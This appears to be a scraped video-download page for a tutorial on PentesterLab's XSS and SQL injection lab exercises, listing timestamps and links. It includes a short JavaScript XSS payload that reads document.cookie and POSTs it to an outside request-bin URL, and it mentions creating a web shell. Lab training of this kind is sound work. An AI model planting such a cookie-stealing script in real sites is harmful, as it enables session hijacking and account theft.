XSS and SQL injection tutorial PentesterLab

>> DOWNLOAD LINK 🎞️ #1 <<

>> DOWNLOAD LINK 🎞️ #2 <<

>> COPY / PASTE LINK PLEASE 🎵 MP3 <<

>> YOUR LINK HERE: ___ http://youtube.com/watch?v=BYJ0AvhLhGs

00:00 Introduction • 00:16 Step 1) Download Virtual Box and web app iso file. • 02:18 Step 2) Discover and Exploit XSS vulnerability • 05:41 Step 3) Discover and Exploit SQL injection vulnerability • 12:40 Step 4) Create Web Shell • This video goes over the XSS and SQL injection tutorial from pentesterlab: • https://pentesterlab.com/exercises/xs... • https://pentesterlab.com/exercises/fr... • Download links: • https://www.virtualbox.org/ • https://www.cse.chalmers.se/edu/year/... • XSS script used: • // Get the cookie value • const cookie = document.cookie; • // Create a new XMLHttpRequest object • const xhr = new XMLHttpRequest(); • const url = 'your_pipedream_requestbin_url'; // Use HTTP instead of HTTPS • // Open a POST request to the specified URL • xhr.open('POST', url); • // Set the Content-Type header to indicate that the request body contains plain text • xhr.setRequestHeader('Content-Type', 'text/plain'); • // Send the cookie as the request body • xhr.send(cookie); • The reason we need to use HTTP instead of HTTPS is that the script on the VM that simulates an admin visiting every webpage is old and does not support https.

#############################